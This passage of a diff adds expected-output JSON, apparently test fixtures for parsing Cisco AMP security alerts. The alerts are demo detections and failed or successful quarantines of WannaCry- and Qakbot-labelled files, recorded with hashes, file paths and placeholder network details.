"cisco.amp.bp_data.normalized.observables.file.name": [ + "powershell.exe", + "wmiprvse.exe" + ], + "cisco.amp.bp_data.normalized.observables.file.path": [ + "c:\\windows\\system32\\windowspowershell\\v1.0", + "c:\\windows\\system32\\wbem" + ], + "cisco.amp.bp_data.observables.file": [ + { + "md5": "a575a7610e5f003cc36df39e07c4ba7d", + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e", + "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218", + "size": 443392, + "type_id": 1 + }, + { + "md5": "d683c112190f4b4c6d477d693ee88e35", + "name": "WmiPrvSE.exe", + "path": "C:\\Windows\\System32\\wbem", + "properties": { + "copyright": "\u00a9 Microsoft Corporation. All rights reserved.", + "file_version": "10.0.14409.1005", + "product": "Microsoft\u00ae Windows\u00ae Operating System", + "product_version": "10.0.14409.1005" + }, + "sha1": "67858ead93feed62c0b1865369840e6e8086f53b", + "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334", + "size": 425984, + "type_id": 1 + } + ], + "cisco.amp.bp_data.remediated": false, + "cisco.amp.bp_data.severity": "medium", + "cisco.amp.bp_data.silent": false, + "cisco.amp.bp_data.start_ts": 1610640884, + "cisco.amp.bp_data.tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.bp_data.ts": 1610640884, + "cisco.amp.bp_data.type": "activity", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "WMIPRVSE Launched Encoded Powershell Command", + "cisco.amp.event_type_id": 553648222, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.mitre_tactics": [ + "TA0002", + "TA0005", + "TA0008" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 810000000, + "event.action": "Threat Detection", + "event.dataset": "cisco.amp", + "event.id": 6880683125978957000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 38130, + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 68391, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 69603, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 70815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 72027, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73239, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 74476, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 75732, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 732000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76965, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204897366867969", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 717000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 78202, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 686000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 79439, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:50:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204897366867977", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 639000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 80676, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 81932, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 83114, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870786", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "", + "file.path": "", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 84487, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 85686, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 87059, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 